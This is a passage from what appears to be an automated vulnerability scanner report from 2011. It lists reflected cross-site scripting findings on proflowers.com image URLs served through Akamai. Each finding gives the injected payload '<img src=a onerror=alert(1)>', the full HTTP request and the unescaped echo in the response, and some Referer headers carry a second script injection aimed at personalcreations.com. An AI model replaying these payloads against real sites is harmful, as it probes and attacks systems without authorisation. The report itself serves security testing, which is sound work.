Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF54ec7<img src=a onerror=alert(1)>fe758beee42

4.76. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 87390<img%20src%3da%20onerror%3dalert(1)>6127ad3d4b was submitted in the REST URL parameter 9. This input was echoed as 87390<img src=a onerror=alert(1)>6127ad3d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF87390<img%20src%3da%20onerror%3dalert(1)>6127ad3d4b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6indblpurpphal_blktin09_PF87390<img src=a onerror=alert(1)>6127ad3d4b

4.77. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 27412<img%20src%3da%20onerror%3dalert(1)>83ab8e888d1 was submitted in the REST URL parameter 9. This input was echoed as 27412<img src=a onerror=alert(1)>83ab8e888d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF27412<img%20src%3da%20onerror%3dalert(1)>83ab8e888d1?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6indblwhtphal_willow09_PF27412<img src=a onerror=alert(1)>83ab8e888d1

4.78. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 136d7<img%20src%3da%20onerror%3dalert(1)>f39e388d55c was submitted in the REST URL parameter 9. This input was echoed as 136d7<img src=a onerror=alert(1)>f39e388d55c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l136d7<img%20src%3da%20onerror%3dalert(1)>f39e388d55c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6inphaltilandsia_curn09_l136d7<img src=a onerror=alert(1)>f39e388d55c

4.79. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3e66c<img%20src%3da%20onerror%3dalert(1)>e0bdb592a3a was submitted in the REST URL parameter 9. This input was echoed as 3e66c<img src=a onerror=alert(1)>e0bdb592a3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF3e66c<img%20src%3da%20onerror%3dalert(1)>e0bdb592a3a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/ORCbromgrdnblk07_PF3e66c<img src=a onerror=alert(1)>e0bdb592a3a

4.80. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a3ae1<img%20src%3da%20onerror%3dalert(1)>81037f6294b was submitted in the REST URL parameter 9. This input was echoed as a3ae1<img src=a onerror=alert(1)>81037f6294b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PFa3ae1<img%20src%3da%20onerror%3dalert(1)>81037f6294b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:01 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblbromgardn09_PFa3ae1<img src=a onerror=alert(1)>81037f6294b

4.81. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2ac5a<img%20src%3da%20onerror%3dalert(1)>380fac3babc was submitted in the REST URL parameter 9. This input was echoed as 2ac5a<img src=a onerror=alert(1)>380fac3babc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF2ac5a<img%20src%3da%20onerror%3dalert(1)>380fac3babc?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblkalblktin08_2_PF2ac5a<img src=a onerror=alert(1)>380fac3babc

4.82. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 56e55<img%20src%3da%20onerror%3dalert(1)>02759dc1b02 was submitted in the REST URL parameter 9. This input was echoed as 56e55<img src=a onerror=alert(1)>02759dc1b02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF56e55<img%20src%3da%20onerror%3dalert(1)>02759dc1b02?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 120
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF56e55<img src=a onerror=alert(1)>02759dc1b02

4.83. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f29c8<img%20src%3da%20onerror%3dalert(1)>5ffa66e876e was submitted in the REST URL parameter 9. This input was echoed as f29c8<img src=a onerror=alert(1)>5ffa66e876e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PFf29c8<img%20src%3da%20onerror%3dalert(1)>5ffa66e876e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:07 GMT
Connection: close

Unable to find /ProvideCommerce/ORCwhtphalylwbrom07_PFf29c8<img src=a onerror=alert(1)>5ffa66e876e

4.84. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d4bb1<img%20src%3da%20onerror%3dalert(1)>e7af5ef796 was submitted in the REST URL parameter 9. This input was echoed as d4bb1<img src=a onerror=alert(1)>e7af5ef796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339bd4bb1<img%20src%3da%20onerror%3dalert(1)>e7af5ef796?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:31 GMT
Connection: close

Unable to find /ProvideCommerce/P0026339bd4bb1<img src=a onerror=alert(1)>e7af5ef796

4.85. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a8f1a<img%20src%3da%20onerror%3dalert(1)>e4b9939c645 was submitted in the REST URL parameter 9. This input was echoed as a8f1a<img src=a onerror=alert(1)>e4b9939c645 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189ba8f1a<img%20src%3da%20onerror%3dalert(1)>e4b9939c645?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:25 GMT
Connection: close

Unable to find /ProvideCommerce/P0049189ba8f1a<img src=a onerror=alert(1)>e4b9939c645

4.86. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 953c7<img%20src%3da%20onerror%3dalert(1)>d73bd45dd2 was submitted in the REST URL parameter 9. This input was echoed as 953c7<img src=a onerror=alert(1)>d73bd45dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b953c7<img%20src%3da%20onerror%3dalert(1)>d73bd45dd2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:25 GMT
Connection: close

Unable to find /ProvideCommerce/P0054324b953c7<img src=a onerror=alert(1)>d73bd45dd2

4.87. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c4c9f<img%20src%3da%20onerror%3dalert(1)>f3daf93728a was submitted in the REST URL parameter 9. This input was echoed as c4c9f<img src=a onerror=alert(1)>f3daf93728a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092bc4c9f<img%20src%3da%20onerror%3dalert(1)>f3daf93728a?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/P0055092bc4c9f<img src=a onerror=alert(1)>f3daf93728a

4.88. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 80d86<img%20src%3da%20onerror%3dalert(1)>c8d53e072ca was submitted in the REST URL parameter 9. This input was echoed as 80d86<img src=a onerror=alert(1)>c8d53e072ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b80d86<img%20src%3da%20onerror%3dalert(1)>c8d53e072ca?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:23 GMT
Connection: close

Unable to find /ProvideCommerce/P0063828b80d86<img src=a onerror=alert(1)>c8d53e072ca

4.89. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 66f8d<img%20src%3da%20onerror%3dalert(1)>51a292d4f1c was submitted in the REST URL parameter 9. This input was echoed as 66f8d<img src=a onerror=alert(1)>51a292d4f1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b66f8d<img%20src%3da%20onerror%3dalert(1)>51a292d4f1c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:18 GMT
Connection: close

Unable to find /ProvideCommerce/P0065857b66f8d<img src=a onerror=alert(1)>51a292d4f1c

4.90. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 89fba<img%20src%3da%20onerror%3dalert(1)>35e1a132750 was submitted in the REST URL parameter 9. This input was echoed as 89fba<img src=a onerror=alert(1)>35e1a132750 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P007188189fba<img%20src%3da%20onerror%3dalert(1)>35e1a132750?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/P007188189fba<img src=a onerror=alert(1)>35e1a132750

4.91. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 26830<img%20src%3da%20onerror%3dalert(1)>e7f4acdcdc5 was submitted in the REST URL parameter 9. This input was echoed as 26830<img src=a onerror=alert(1)>e7f4acdcdc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b26830<img%20src%3da%20onerror%3dalert(1)>e7f4acdcdc5?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/P0073650b26830<img src=a onerror=alert(1)>e7f4acdcdc5

4.92. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b [REST URL parameter 9]

Summary

